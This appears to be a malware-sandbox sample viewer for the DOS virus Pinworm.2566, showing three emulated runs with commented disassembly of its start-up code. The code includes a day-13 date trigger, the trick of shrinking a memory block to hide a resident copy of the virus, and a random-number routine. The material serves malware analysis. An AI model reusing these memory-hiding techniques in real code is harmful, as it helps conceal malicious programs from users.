Sample viewer

vx.netlux.org/Virus.DOS.Virogen.Pinworm.2566


Syscalls:

Time Syscall Op Syscall Name
; Start-up trace, first fragment: date check and copy to the top of memory.
; The "Syscall Op" values 42 and 44 equal 2Ah and 2Ch, the INT 21h function
; numbers for DOS Get Date and Get Time. Op 250 is therefore presumably
; INT 21h AH=FAh, which standard DOS does not define -- possibly the sample's
; own "already installed?" probe (TODO confirm; the call site is not shown).
2018-12-17T22:58:22.368581325Z 250 PC: 12bc4 | UNKNOWN!
; DOS Get Date returns the day of the month in DL, so the compare below is a
; date trigger: on day 13 (0x0d) a flag byte at cs:[bp + 0x7dd] is set to 1.
; What the flag enables is outside this fragment.
2018-12-17T22:58:22.369770517Z 42 PC: 12bcc | Get date 0x12bcc: cmp dl, 0xd
0x12bcf: jne 0x12bd7
0x12bd1: mov byte ptr cs:[bp + 0x7dd], 1
; DS = ES - 1. Assuming ES still holds the PSP segment from program entry
; (TODO confirm), DS now addresses the memory control block (MCB) that sits
; one paragraph below the PSP.
0x12bd7: mov ax, es
0x12bd9: dec ax
0x12bda: mov ds, ax
; MCB byte 0 is the block type; 0x5a ('Z') marks the last block in the chain.
; Any other type skips the resize/copy and continues at 0x12c28 (not shown).
0x12bdc: cmp byte ptr [0], 0x5a
0x12be1: jne 0x12c28
; Shrink the block by 0x180 paragraphs (6144 bytes): MCB offset 3 is the size
; field, and DS:0x12 is PSP offset 2 (the top-of-memory segment), because DS
; is one paragraph below the PSP. The region cut off is no longer described
; by the MCB chain, which is the observable artefact of this technique.
0x12be3: sub word ptr [3], 0x180
0x12be9: sub word ptr [0x12], 0x180
; ES = lowered top-of-memory segment, i.e. the start of the region cut off.
0x12bef: mov es, word ptr [0x12]
; Copy from CS:BP (BP appears to hold the body's base offset) to ES:0000,
; CX = 0x491 elements.
0x12bf3: push cs
0x12bf4: pop ds
0x12bf5: mov si, bp
0x12bf7: mov cx, 0x491
0x12bfa: xor di, di
; NOTE(review): the listing prints a dword move, but the instruction spans
; only two bytes (0x12bfc-0x12bfe). In 16-bit code a 32-bit string move needs
; an operand-size prefix and would be three bytes, so this is probably
; rep movsw (0x491 words = 2338 bytes) -- verify against the raw bytes.
0x12bfc: rep movsd dword ptr es:[di], dword ptr [si]
; DS = 0000h, the segment of the real-mode interrupt vector table. The code
; that uses it lies beyond the end of this fragment.
0x12bfe: xor ax, ax
0x12c00: mov ds, ax
0x12c02: push ds
; Start-up trace, second fragment: pseudo-random number generator.
; DOS Get Time returns seconds in DH and hundredths in DL; DX is stored in the
; word at offset 0x7e4, which the routine below uses as its 16-bit state.
; The start of this seeding routine is before the fragment.
2018-12-17T22:58:22.371848609Z 44 PC: 130b3 | Get time 0x130b3: mov word ptr [0x7e4], dx
0x130b7: pop ax
0x130b8: ret
; Separate routine starting at 0x130b9. In: AX = upper bound. Out: DX = value
; below the bound, with 0 replaced by 1. Clobbers AX; CX = the bound on exit.
0x130b9: push ax
; Linear congruential step: state = state * 0x7ab5 + 0x3619 (low 16 bits kept).
0x130ba: mov ax, word ptr [0x7e4]
0x130bd: mov cx, 0x7ab5
0x130c0: mul cx
0x130c2: add ax, 0x3619
0x130c5: mov word ptr [0x7e4], ax
; DX:AX = state * bound; the high word DX is the state scaled into 0..bound-1.
0x130c8: pop cx
0x130c9: mul cx
; Never return 0: a zero result is bumped to 1.
0x130cb: cmp dx, 0
0x130ce: jne 0x130d1
0x130d0: inc dx
0x130d1: ret
; NOTE(review): the next five one-byte opcodes are 43 48 4B 4C 49, ASCII
; "CHKLI". They follow a ret, so this is most likely string data disassembled
; as code rather than executed instructions -- confirm against the raw bytes.
0x130d2: inc bx
0x130d3: dec ax
0x130d4: dec bx
0x130d5: dec sp
0x130d6: dec cx

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12863,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Start-up trace, first fragment: date check and copy to the top of memory.
; The "Syscall Op" values 42 and 44 equal 2Ah and 2Ch, the INT 21h function
; numbers for DOS Get Date and Get Time. Op 250 is therefore presumably
; INT 21h AH=FAh, which standard DOS does not define -- possibly the sample's
; own "already installed?" probe (TODO confirm; the call site is not shown).
2018-12-25T12:36:40.910127459Z 250 PC: 12bc4 | UNKNOWN!
; DOS Get Date returns the day of the month in DL, so the compare below is a
; date trigger: on day 13 (0x0d) a flag byte at cs:[bp + 0x7dd] is set to 1.
; What the flag enables is outside this fragment.
2018-12-25T12:36:40.911351046Z 42 PC: 12bcc | Get date 0x12bcc: cmp dl, 0xd
0x12bcf: jne 0x12bd7
0x12bd1: mov byte ptr cs:[bp + 0x7dd], 1
; DS = ES - 1. Assuming ES still holds the PSP segment from program entry
; (TODO confirm), DS now addresses the memory control block (MCB) that sits
; one paragraph below the PSP.
0x12bd7: mov ax, es
0x12bd9: dec ax
0x12bda: mov ds, ax
; MCB byte 0 is the block type; 0x5a ('Z') marks the last block in the chain.
; Any other type skips the resize/copy and continues at 0x12c28 (not shown).
0x12bdc: cmp byte ptr [0], 0x5a
0x12be1: jne 0x12c28
; Shrink the block by 0x180 paragraphs (6144 bytes): MCB offset 3 is the size
; field, and DS:0x12 is PSP offset 2 (the top-of-memory segment), because DS
; is one paragraph below the PSP. The region cut off is no longer described
; by the MCB chain, which is the observable artefact of this technique.
0x12be3: sub word ptr [3], 0x180
0x12be9: sub word ptr [0x12], 0x180
; ES = lowered top-of-memory segment, i.e. the start of the region cut off.
0x12bef: mov es, word ptr [0x12]
; Copy from CS:BP (BP appears to hold the body's base offset) to ES:0000,
; CX = 0x491 elements.
0x12bf3: push cs
0x12bf4: pop ds
0x12bf5: mov si, bp
0x12bf7: mov cx, 0x491
0x12bfa: xor di, di
; NOTE(review): the listing prints a dword move, but the instruction spans
; only two bytes (0x12bfc-0x12bfe). In 16-bit code a 32-bit string move needs
; an operand-size prefix and would be three bytes, so this is probably
; rep movsw (0x491 words = 2338 bytes) -- verify against the raw bytes.
0x12bfc: rep movsd dword ptr es:[di], dword ptr [si]
; DS = 0000h, the segment of the real-mode interrupt vector table. The code
; that uses it lies beyond the end of this fragment.
0x12bfe: xor ax, ax
0x12c00: mov ds, ax
0x12c02: push ds
; Start-up trace, second fragment: pseudo-random number generator.
; DOS Get Time returns seconds in DH and hundredths in DL; DX is stored in the
; word at offset 0x7e4, which the routine below uses as its 16-bit state.
; The start of this seeding routine is before the fragment.
2018-12-25T12:36:40.913980536Z 44 PC: 130b3 | Get time 0x130b3: mov word ptr [0x7e4], dx
0x130b7: pop ax
0x130b8: ret
; Separate routine starting at 0x130b9. In: AX = upper bound. Out: DX = value
; below the bound, with 0 replaced by 1. Clobbers AX; CX = the bound on exit.
0x130b9: push ax
; Linear congruential step: state = state * 0x7ab5 + 0x3619 (low 16 bits kept).
0x130ba: mov ax, word ptr [0x7e4]
0x130bd: mov cx, 0x7ab5
0x130c0: mul cx
0x130c2: add ax, 0x3619
0x130c5: mov word ptr [0x7e4], ax
; DX:AX = state * bound; the high word DX is the state scaled into 0..bound-1.
0x130c8: pop cx
0x130c9: mul cx
; Never return 0: a zero result is bumped to 1.
0x130cb: cmp dx, 0
0x130ce: jne 0x130d1
0x130d0: inc dx
0x130d1: ret
; NOTE(review): the next five one-byte opcodes are 43 48 4B 4C 49, ASCII
; "CHKLI". They follow a ret, so this is most likely string data disassembled
; as code rather than executed instructions -- confirm against the raw bytes.
0x130d2: inc bx
0x130d3: dec ax
0x130d4: dec bx
0x130d5: dec sp
0x130d6: dec cx

{"DateBased":true,"Day":13,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12863,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Start-up trace, first fragment: date check and copy to the top of memory.
; The "Syscall Op" values 42 and 44 equal 2Ah and 2Ch, the INT 21h function
; numbers for DOS Get Date and Get Time. Op 250 is therefore presumably
; INT 21h AH=FAh, which standard DOS does not define -- possibly the sample's
; own "already installed?" probe (TODO confirm; the call site is not shown).
2018-12-25T12:36:41.305816507Z 250 PC: 12bc4 | UNKNOWN!
; DOS Get Date returns the day of the month in DL, so the compare below is a
; date trigger: on day 13 (0x0d) a flag byte at cs:[bp + 0x7dd] is set to 1.
; What the flag enables is outside this fragment.
2018-12-25T12:36:41.307552193Z 42 PC: 12bcc | Get date 0x12bcc: cmp dl, 0xd
0x12bcf: jne 0x12bd7
0x12bd1: mov byte ptr cs:[bp + 0x7dd], 1
; DS = ES - 1. Assuming ES still holds the PSP segment from program entry
; (TODO confirm), DS now addresses the memory control block (MCB) that sits
; one paragraph below the PSP.
0x12bd7: mov ax, es
0x12bd9: dec ax
0x12bda: mov ds, ax
; MCB byte 0 is the block type; 0x5a ('Z') marks the last block in the chain.
; Any other type skips the resize/copy and continues at 0x12c28 (not shown).
0x12bdc: cmp byte ptr [0], 0x5a
0x12be1: jne 0x12c28
; Shrink the block by 0x180 paragraphs (6144 bytes): MCB offset 3 is the size
; field, and DS:0x12 is PSP offset 2 (the top-of-memory segment), because DS
; is one paragraph below the PSP. The region cut off is no longer described
; by the MCB chain, which is the observable artefact of this technique.
0x12be3: sub word ptr [3], 0x180
0x12be9: sub word ptr [0x12], 0x180
; ES = lowered top-of-memory segment, i.e. the start of the region cut off.
0x12bef: mov es, word ptr [0x12]
; Copy from CS:BP (BP appears to hold the body's base offset) to ES:0000,
; CX = 0x491 elements.
0x12bf3: push cs
0x12bf4: pop ds
0x12bf5: mov si, bp
0x12bf7: mov cx, 0x491
0x12bfa: xor di, di
; NOTE(review): the listing prints a dword move, but the instruction spans
; only two bytes (0x12bfc-0x12bfe). In 16-bit code a 32-bit string move needs
; an operand-size prefix and would be three bytes, so this is probably
; rep movsw (0x491 words = 2338 bytes) -- verify against the raw bytes.
0x12bfc: rep movsd dword ptr es:[di], dword ptr [si]
; DS = 0000h, the segment of the real-mode interrupt vector table. The code
; that uses it lies beyond the end of this fragment.
0x12bfe: xor ax, ax
0x12c00: mov ds, ax
0x12c02: push ds
; Start-up trace, second fragment: pseudo-random number generator.
; DOS Get Time returns seconds in DH and hundredths in DL; DX is stored in the
; word at offset 0x7e4, which the routine below uses as its 16-bit state.
; The start of this seeding routine is before the fragment.
2018-12-25T12:36:41.30997807Z 44 PC: 130b3 | Get time 0x130b3: mov word ptr [0x7e4], dx
0x130b7: pop ax
0x130b8: ret
; Separate routine starting at 0x130b9. In: AX = upper bound. Out: DX = value
; below the bound, with 0 replaced by 1. Clobbers AX; CX = the bound on exit.
0x130b9: push ax
; Linear congruential step: state = state * 0x7ab5 + 0x3619 (low 16 bits kept).
0x130ba: mov ax, word ptr [0x7e4]
0x130bd: mov cx, 0x7ab5
0x130c0: mul cx
0x130c2: add ax, 0x3619
0x130c5: mov word ptr [0x7e4], ax
; DX:AX = state * bound; the high word DX is the state scaled into 0..bound-1.
0x130c8: pop cx
0x130c9: mul cx
; Never return 0: a zero result is bumped to 1.
0x130cb: cmp dx, 0
0x130ce: jne 0x130d1
0x130d0: inc dx
0x130d1: ret
; NOTE(review): the next five one-byte opcodes are 43 48 4B 4C 49, ASCII
; "CHKLI". They follow a ret, so this is most likely string data disassembled
; as code rather than executed instructions -- confirm against the raw bytes.
0x130d2: inc bx
0x130d3: dec ax
0x130d4: dec bx
0x130d5: dec sp
0x130d6: dec cx